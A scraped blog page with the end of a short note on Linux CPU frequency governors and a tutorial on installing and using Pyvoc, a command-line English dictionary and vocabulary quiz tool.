userspce: The CPU freq governor “user-space” allows the user, or any user-space program
running with UID “root”, to set the CPU to a specific frequency by making a sysfs
file “scaling_setspeed” available in the CPU-device directory.
powersave: The CPU freq governor “powersave” sets the CPU statically to the lowest
frequency within the borders of scaling_min_freq and scaling_max_freq.
performance: The CPU freq governor “performance” sets the CPU statically to the highest
frequency within the borders of scaling_min_freq and scaling_max_freq.

How to find available_governors?


cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors


Sample output:


conservative ondemand userspace powersave performance


Set permanently one eg.:

sudo echo “performance” > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


performance

Source

A Command line Dictionary And Vocabulary Building Tool

Howdy! I have a good news for non-native English speakers. Now, you can improve your English vocabulary and find the meaning of English words, right from your Terminal. Say hello to Pyvoc, a cross-platform, open source, command line dictionary and vocabulary building tool written in Python programming language. Using this tool, you can brush up some English words meanings, test or improve your vocabulary skill or simply use it as a CLI dictionary on Unix-like operating systems.

Installing Pyvoc

Since Pyvoc is written using Python language, you can install it using Pip3 package manager.

$ pip3 install pyvoc

Once installed, run the following command to automatically create necessary configuration files in your $HOME directory.

$ pyvoc word

Sample output:

|Creating necessary config files
/getting api keys. please handle with care!
|

word 
Noun: single meaningful element of speech or writing
example: I don't like the word ‘unofficial’

Verb: express something spoken or written
example: he words his request in a particularly ironic way

Interjection: used to express agreement or affirmation
example: Word, that's a good record, man

Done! Let us go ahead and brush the English skills.

Use Pyvoc as a command line Dictionary tool

Pyvoc fetches the word meaning from Oxford Dictionary API.

Let us say, you want to find the meaning of a word ‘digression’. To do so, run:

$ pyvoc digression
pyvoc1

Find a word meaning using Pyvoc

See? Pyvoc not only displays the meaning of word ‘digression’, but also an example sentence which shows how to use that word in practical.

Let us see an another example.

$ pyvoc subterfuge
|

subterfuge 
Noun: deceit used in order to achieve one's goal
example: he had to use subterfuge and bluff on many occasions

It also shows the word classes as well. As you already know, English has four major word classes:

  1. Nouns,
  2. Verbs,
  3. Adjectives,
  4. Adverbs.

Take a look at the following example.

$ pyvoc welcome
 /

welcome 
Noun:            instance or manner of greeting someone
example:         you will receive a warm welcome

Interjection:    used to greet someone in polite or friendly way
example:         welcome to the Wildlife Park

Verb:            greet someone arriving in polite or friendly way
example:         hotels should welcome guests in their own language

Adjective:       gladly received
example:         I'm pleased to see you, lad—you're welcome

As you see in the above output, the word ‘welcome’ can be used as a verb, noun, adjective and interjection. Pyvoc has given example for each class.

If you misspell a word, it will inform you to check the spelling of the given word.

$ pyvoc wlecome
\
No definition found. Please check the spelling!!

Useful, isn’t it?

Create vocabulary groups

A vocabulary group is nothing but a collection words added by the user. You can later revise or take quiz from these groups. 100 groups of 60 words are reserved for the user.

To add a word (E.g sporadic) to a group, just run:

$ pyvoc sporadic -a
-

sporadic 
Adjective: occurring at irregular intervals or only in few places
example: sporadic fighting broke out


writing to vocabulary group...
word added to group number 51

As you can see, I didn’t provide any group number and pyvoc displayed the meaning of given word and automatically added that word to group number 51. If you don’t provide the group number, Pyvoc will incrementally add words to groups 51-100.

Pyvoc also allows you to specify a group number if you want to. You can specify a group from 1-50 using -goption. For example, I am going to add a word to Vocabulary group 20 using the following command.

$ pyvoc discrete -a -g 20
 /

discrete 
Adjective:       individually separate and distinct
example:         speech sounds are produced as a continuous sound signal rather
               than discrete units

creating group Number 20...
writing to vocabulary group...
word added to group number 20

See? The above command displays the meaning of ‘discrete’ word and adds it to the vocabulary group 20. If the group doesn’t exists, Pyvoc will create it and add the word.

By default, Pyvoc includes three predefined vocabulary groups (101, 102, and 103). These custom groups has 800 words of each. All words in these groups are taken from GRE and SAT preparation websites.

To view the user-generated groups, simply run:

$ pyvoc word -l
 -

word 
Noun:            single meaningful element of speech or writing
example:         I don't like the word ‘unofficial’

Verb:            express something spoken or written
example:         he words his request in a particularly ironic way

Interjection:    used to express agreement or affirmation
example:         Word, that's a good record, man


USER GROUPS
Group no.      No. of words
20             1

DEFAULT GROUP
Group no.      No. of words
51             1

As you see, I have created one group (20) including the default group (51).

Test and improve English vocabulary

As I already said, you can use the Vocabulary groups to revise or take quiz from them.

For instance, to revise the group no. 101, use -r option like below.

$ pyvoc 101 -r

You can now revise the meaning of all words in the Vocabulary group 101 in random order. Just hit ENTER to go through next questions. Once done, hit CTRL+C to exit.

pyvoc2

Revise Vocabulary group

Also, you take quiz from the existing groups to brush up your vocabulary. To do so, use -q option like below.

$ pyvoc 103 -q 50

This command allows you to take quiz of 50 questions from vocabulary group 103. Choose the correct answer from the list by entering the appropriate number. You will get 1 point for every correct answer. The more you score the more your vocabulary skill will be.

pyvoc3

Take quiz using Pyvoc

Pyvoc is in the early-development stage. I hope the developer will improve it and add more features in the days to come.

As a non-native English speaker, I personally find it useful to test and learn new word meanings in my free time. If you’re a heavy command line user and wanted to quickly check the meaning of a word, Pyvoc is the right tool. You can also test your English Vocabulary at your free time to memorize and improve your English language skill. Give it a try. You won’t be disappointed.

And, that’s all for now. Hope this was useful. More good stuffs to come. Stay tuned! Cheers!

Resource:

Source

WP2Social Auto Publish Powered By : XYZScripts.com